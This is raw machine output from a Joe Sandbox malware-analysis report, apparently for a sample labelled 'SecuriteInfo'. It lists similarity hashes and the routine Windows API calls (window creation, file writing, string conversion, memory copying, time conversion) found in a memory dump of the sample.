                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$freemalloc
                                                              • String ID:
                                                              • API String ID: 2605342592-0
                                                              • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                              • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                              • RegisterClassW.USER32(?), ref: 00412428
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                              • String ID:
                                                              • API String ID: 2678498856-0
                                                              • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                              • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F673
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                              • strlen.MSVCRT ref: 0040F6A2
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                              • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F6E2
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                              • strlen.MSVCRT ref: 0040F70D
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                              • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                              APIs
                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                              • String ID:
                                                              • API String ID: 764393265-0
                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Time$System$File$LocalSpecific
                                                              • String ID:
                                                              • API String ID: 979780441-0
                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                              APIs
                                                              • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                              • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpy$DialogHandleModuleParam
                                                              • String ID:
                                                              • API String ID: 1386444988-0
                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
APIs
• wcschr.MSVCRT ref: 0040F79E
• wcschr.MSVCRT ref: 0040F7AC
  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
Memory Dump Source
• Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: wcschr$memcpywcslen
• String ID: "
• API String ID: 1983396471-123907689
APIs
• _snwprintf.MSVCRT ref: 0040A398
• memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
Memory Dump Source
• Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: _snwprintfmemcpy
• String ID: %2.2X
• API String ID: 2789212964-323797159
APIs
• memset.MSVCRT ref: 0040E770
• SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
Memory Dump Source
• Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: MessageSendmemset
• String ID: F^@
• API String ID: 568519121-3652327722
APIs
• wcslen.MSVCRT ref: 0040B1DE
• free.MSVCRT ref: 0040B201
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B224
• memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
Memory Dump Source
• Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
• API String ID: 726966127-0
APIs
• strlen.MSVCRT ref: 0040B0D8
• free.MSVCRT ref: 0040B0FB
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B12C
• memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
Memory Dump Source
• Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: free$memcpy$mallocstrlen
• String ID:
• API String ID: 3669619086-0
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
• malloc.MSVCRT ref: 00417407
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
• free.MSVCRT ref: 00417425
Memory Dump Source
• Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0